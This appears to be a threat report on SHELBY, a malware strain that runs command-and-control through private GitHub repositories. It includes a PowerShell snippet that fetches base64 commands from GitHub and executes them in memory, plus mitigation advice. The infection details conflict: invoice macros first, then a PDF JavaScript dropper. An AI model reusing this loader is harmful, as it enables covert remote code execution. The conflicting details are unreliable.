A sophisticated new malware strain, dubbed SHELBY, has emerged, posing a significant threat to financial institutions and healthcare organizations across North America and Europe. This malware employs a multi-stage infection process, beginning with phishing emails that contain seemingly legitimate invoice attachments. When recipients open these attachments, they trigger malicious macros that initiate the infection chain.
Once installed, SHELBY operates stealthily in the background, collecting sensitive information such as login credentials, financial data, and patient records. The malware then exfiltrates this data to its operators, compromising the security and privacy of affected organizations and individuals.
What sets SHELBY apart is its innovative use of GitHub’s infrastructure for command-and-control (C2) operations. The malware creates and accesses private repositories on GitHub, where its operators store commands encoded in base64 strings within seemingly innocuous text files. This method allows SHELBY to blend its communication within legitimate HTTPS traffic to GitHub’s domains, making detection significantly more challenging for traditional security tools that typically do not block access to widely-used development platforms.
Elastic analysts identified SHELBY in early March 2025 while investigating a series of data breaches across multiple healthcare providers. Their analysis revealed that the malware had remained undetected for approximately three months before discovery, highlighting its sophisticated evasion capabilities. The researchers noted that this represents a growing trend of threat actors leveraging trusted platforms and services to host malicious infrastructure.
The impact of SHELBY has been substantial, with at least 17 organizations confirming data breaches linked to this malware. Compromised data includes personally identifiable information, healthcare records, and financial account details. Several affected organizations have already begun notifying customers of potential data exposure in compliance with regulatory requirements.
Infection Mechanism
SHELBY’s infection process begins with a JavaScript dropper embedded in PDF attachments. When executed, this dropper downloads a PowerShell script from a compromised website. The script contains code that establishes communication with its GitHub-based C2:
“`powershell
$repo = https://api.github.com/repos/legitimate-looking-name/resources/contents
$token = ghp_1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s0
$encodedAuth = [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($token))
$headers = @{Authorization = Basic $encodedAuth}
$response = Invoke-WebRequest -Uri $repo -Headers $headers | ConvertFrom-Json
$commands = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($response.Content))
Invoke-Expression $commands
“`
This code retrieves base64-encoded instructions from the GitHub repository, decodes them, and executes them directly in memory, leaving minimal traces on disk. The malware maintains persistence through a scheduled task that appears as a legitimate system maintenance process, helping it evade detection by security solutions.
Broader Context
SHELBY’s exploitation of GitHub for C2 operations is part of a broader trend where cybercriminals abuse trusted platforms to conduct malicious activities. For instance, in August 2024, a campaign was reported where GitHub comments were abused to distribute the Lumma Stealer information-stealing malware. Attackers posted fake fixes in project comments, leading users to download password-protected archives containing the malware. This method allowed the malware to steal cookies, credentials, passwords, credit card information, and browsing history from various browsers.
Similarly, in March 2025, Microsoft reported a large-scale malvertising campaign that led to information stealers hosted on GitHub. The attack originated from illegal streaming websites embedded with malvertising redirectors, leading users to GitHub repositories hosting malware. Once the initial malware gained a foothold on the device, additional payloads were deployed to collect system information and exfiltrate documents and data from the compromised host.
These incidents underscore the growing trend of threat actors leveraging trusted platforms like GitHub to host and distribute malware, making detection and mitigation more challenging.
Mitigation Strategies
To protect against threats like SHELBY, organizations should implement the following strategies:
1. Employee Training: Educate staff about the dangers of phishing emails and the importance of verifying the authenticity of email attachments before opening them.
2. Email Filtering: Deploy advanced email filtering solutions to detect and block phishing attempts.
3. Endpoint Protection: Utilize endpoint detection and response (EDR) solutions capable of identifying and mitigating malicious activities.
4. Network Monitoring: Monitor network traffic for unusual patterns, such as unexpected communications with external repositories.
5. Access Controls: Restrict access to development platforms like GitHub to only those employees who require it for their roles.
6. Regular Updates: Keep all systems and software up to date with the latest security patches to minimize vulnerabilities.
By adopting these measures, organizations can enhance their defenses against sophisticated malware threats like SHELBY and protect sensitive data from unauthorized access.
